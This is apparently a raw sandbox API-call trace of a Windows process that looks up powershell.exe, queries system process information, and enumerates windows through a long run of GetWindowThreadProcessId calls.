	[0723.694] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x13f370000, lpFilename=0x17f120, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0723.694] CoTaskMemFree (pv=0x17f120) 
	[0723.695] CloseHandle (hObject=0x2e4) returned 1
	[0723.703] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf44) returned 0x2e4
	[0723.704] GetExitCodeProcess (in: hProcess=0x2e4, lpExitCode=0x24de98 | out: lpExitCode=0x24de98*=0x103) returned 1
	[0723.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12ccb088, Length=0x20000, ResultLength=0x24de60 | out: SystemInformation=0x12ccb088, ResultLength=0x24de60*=0x3d070) returned 0xc0000004
	[0723.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12ceb0b8, Length=0x3f870, ResultLength=0x24de60 | out: SystemInformation=0x12ceb0b8, ResultLength=0x24de60*=0x3d070) returned 0x0
	[0725.336] EnumWindows (lpEnumFunc=0x29466ac, lParam=0x0) returned 1
	[0725.337] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4d0
	[0725.337] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x558
	[0725.338] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4d0
	[0725.338] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4d0
	[0725.338] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4d0
	[0725.338] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x538
	[0725.338] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4d0
	[0725.338] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x778
	[0725.338] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x778
	[0725.338] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4d0
	[0725.338] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4d0
	[0725.339] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4d0
	[0725.339] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4d0
	[0725.339] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4d0
	[0725.339] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4d0
	[0725.339] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4d0
	[0725.339] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4d0
	[0725.339] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x460
	[0725.339] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4d0
	[0725.340] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4d0
	[0725.340] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1e94
	[0725.340] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1e28
	[0725.340] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1df8
	[0725.340] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1da8
	[0725.340] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1c70
	[0725.341] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x163c
	[0725.341] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1a10
	[0725.341] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x186c
	[0725.341] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1d74
	[0725.341] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4c8
	[0725.341] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1960
	[0725.341] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1ce4
	[0725.341] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1b24
	[0725.341] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x14e0
	[0725.342] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x17f0
	[0725.342] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x854
	[0725.342] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1268
	[0725.342] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1624
	[0725.342] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1b9c
	[0725.342] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x16f4
	[0725.342] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x145c
	[0725.343] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x17d0
	[0725.343] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1d28
	[0725.343] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xcb8
	[0725.343] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1190
	[0725.343] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x3a8
	[0725.343] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1bd0
	[0725.343] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1bfc
	[0725.343] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1a78
	[0725.343] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1b90
	[0725.344] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1b04
	[0725.344] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1b34
	[0725.344] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1b64
	[0725.344] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1bb0
	[0725.344] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1acc
	[0725.344] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1a2c
	[0725.344] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x19a8
	[0725.344] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1944
	[0725.345] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x18c8
	[0725.345] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x18ac
	[0725.345] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x18ec
	[0725.345] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1898
	[0725.345] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xc98
	[0725.345] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x153c
	[0725.345] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1808
	[0725.345] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x12a4
	[0725.346] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1740
	[0725.346] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x16c4
	[0725.346] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1820
	[0725.346] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x16ac
	[0725.346] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1858
	[0725.346] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1664
	[0725.346] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x10b4
	[0725.346] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x10ac
	[0725.347] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x10ec
	[0725.347] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1068
	[0725.347] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x17e0
	[0725.349] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x102c
	[0725.349] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x17a4
	[0725.349] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1050
	[0725.349] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1694
	[0725.349] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1770
	[0725.349] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1720
	[0725.350] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x165c
	[0725.350] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1578
	[0725.350] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x16c0
	[0725.350] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x161c
	[0725.350] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1638
	[0725.350] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x15c8
	[0725.350] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1554
	[0725.350] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1674
	[0725.351] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1520
	[0725.351] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x14bc
	[0725.351] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xf8c
	[0725.351] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xe9c
	[0725.351] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1434
	[0725.351] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x14ec
	[0725.351] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xfcc
	[0725.351] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x12ac
	[0725.352] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1484
	[0725.352] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x934
	[0725.352] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xc0c
	[0725.352] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xb08
	[0725.352] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x948
	[0725.352] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1178
	[0725.352] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x13e0
	[0725.352] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xcd0
	[0725.353] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x13fc
	[0725.353] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xdc8
	[0725.353] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xc18
	[0725.353] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xc2c
	[0725.353] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xa1c
	[0725.353] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1244
	[0725.353] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xdb0
	[0725.353] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1398
	[0725.353] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1358
	[0725.354] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1370
	[0725.354] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1340
	[0725.354] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x130c
	[0725.354] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x12c0
	[0725.354] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x12e4
	[0725.354] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1270
	[0725.354] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1298
	[0725.354] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x120c
	[0725.355] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x122c
	[0725.355] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x11c4
	[0725.355] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x11b0
	[0725.355] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1188
	[0725.355] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1148
	[0725.355] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1160
	[0725.355] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x10fc
	[0725.355] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xe34
	[0725.356] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xea4
	[0725.356] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x514
	[0725.356] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xe48
	[0725.356] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xbc8
	[0725.357] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xdf8
	[0725.357] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x318
	[0725.357] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xcac
	[0725.357] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x8bc
	[0725.357] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xf9c
	[0725.357] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xf48
	[0725.358] GetWindow (hWnd=0x10430, uCmd=0x4) returned 0x0
	[0725.359] IsWindowVisible (hWnd=0x10430) returned 0
	[0725.359] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xe40
	[0725.359] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xecc
	[0725.359] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xeb8
	[0725.359] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xe80
	[0725.360] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xe98
	[0725.360] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xe60
	[0725.360] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xee4
	[0725.360] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xf00
	[0725.360] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xdf0
	[0725.360] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xe1c
	[0725.360] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xdd0
	[0725.360] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xd94
	[0725.361] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xd74
	[0725.361] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xd00
	[0725.361] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xcd8
	[0725.361] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xc84
	[0725.361] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xca4
	[0725.361] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xc64
	[0725.361] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xc24
	[0725.361] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xb84
	[0725.362] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xbac
	[0725.362] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x384
	[0725.362] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xab8
	[0725.362] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x33c
	[0725.362] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xa44
	[0725.362] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xa64
	[0725.362] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x8a8
	[0725.362] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xaf0
	[0725.362] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x88c
	[0725.363] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xb04
	[0725.363] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x910
	[0725.363] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x230
	[0725.363] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xac0
	[0725.363] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xab4
	[0725.363] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xaac
	[0725.363] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x3d0
	[0725.363] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x978
	[0725.364] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xa7c
	[0725.364] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x59c
	[0725.364] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xa88
	[0725.364] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xa6c
